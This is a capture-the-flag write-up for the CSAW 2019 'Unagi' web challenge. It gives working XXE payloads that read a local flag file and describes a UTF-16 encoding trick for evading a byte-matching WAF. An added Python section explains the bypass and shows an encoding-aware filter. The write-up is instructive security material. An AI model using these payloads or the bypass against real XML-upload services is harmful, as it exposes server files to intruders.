[CSAWQual 2019] Web_Unagi
/index.php
/user.php
/upload.php
/sample.xml
<?xml version='1.0'?>
<users>
<user>
<username>alice</username>
<password>passwd1</password>
<name>Alice</name>
<email>alice@fakesite.com</email>
<group>CSAW2019</group>
</user>
<user>
<username>bob</username>
<password>passwd2</password>
<name> Bob</name>
<email>bob@fakesite.com</email>
<group>CSAW2019</group>
</user>
</users>
/about.php
Trying XXE
<?xml version='1.0'?>
<!DOCTYPE xxe [
<!ENTITY flag SYSTEM "file:///flag">
]>
<users>
<user>
<username>sad</username>
<password>114514</password>
<name>CrackTC</name>
<email>123@baidu.com</email>
<group>&flag;</group>
</user>
</users>
Blocked by the WAF.
After converting the file encoding to UTF-16, the bypass succeeded.
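An added illustration of why the UTF-16 trick above defeats a byte-level WAF, and what a check that sniffs the encoding first looks like (my own code, not the challenge's filter; the XXE and benign documents are constructed samples modelled on the write-up's payloads):

```python
import re

# Constructed inputs modelled on the write-up, not the challenge's real files.
XXE_DOC = (
    "<?xml version='1.0'?>\n"
    "<!DOCTYPE xxe [\n"
    '<!ENTITY flag SYSTEM "file:///flag">\n'
    "]>\n"
    "<users><user><username>&flag;</username></user></users>\n"
)
BENIGN_DOC = (
    "<?xml version='1.0'?>\n"
    "<users><user><username>alice</username></user></users>\n"
)


def sniff_encoding(raw: bytes) -> str:
    """Pick the decoder from the BOM or the first bytes (XML spec, Appendix F)."""
    if raw.startswith((b"\xff\xfe", b"\xfe\xff")):
        return "utf-16"              # BOM present; the codec reads byte order from it
    if raw.startswith(b"\x3c\x00"):  # '<' then NUL: UTF-16LE without BOM
        return "utf-16-le"
    if raw.startswith(b"\x00\x3c"):  # NUL then '<': UTF-16BE without BOM
        return "utf-16-be"
    return "utf-8"


def naive_filter(raw: bytes) -> bool:
    """ASCII keyword match on raw bytes, like the WAF that was bypassed.
    UTF-16 interleaves NUL bytes between characters, so the markers never match."""
    return b"<!DOCTYPE" in raw or b"<!ENTITY" in raw


def robust_filter(raw: bytes) -> bool:
    """Decode according to the sniffed encoding first, then look for a DTD.
    A user-profile upload has no legitimate reason to carry one."""
    text = raw.decode(sniff_encoding(raw), errors="replace")
    return re.search(r"<!(DOCTYPE|ENTITY)\b", text, re.IGNORECASE) is not None
```

Even the robust check is only defence in depth; the real fix is configuring the server-side XML parser to refuse DTDs and external entity resolution.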
The group field seems to get truncated, so just put the entity in every field.
<?xml version='1.0'?>
<!DOCTYPE xxe [
<!ENTITY flag SYSTEM "file:///flag">
]>
<users>
<user>
<username>&flag;</username>
<password>&flag;</password>
<name>&flag;</name>
<email>&flag;</email>
<group>&flag;</group>
</user>
</users>
But they all got truncated qaq
Finally found there is also an intro field that is not in the sample.
<?xml version='1.0'?>
<!DOCTYPE xxe [
<!ENTITY flag SYSTEM "file:///flag">
]>
<users>
<user>
<username>&flag;</username>
<password>&flag;</password>
<name>&flag;</name>
<email>&flag;</email>
<group>&flag;</group>
<intro>&flag;</intro>
</user>
</users>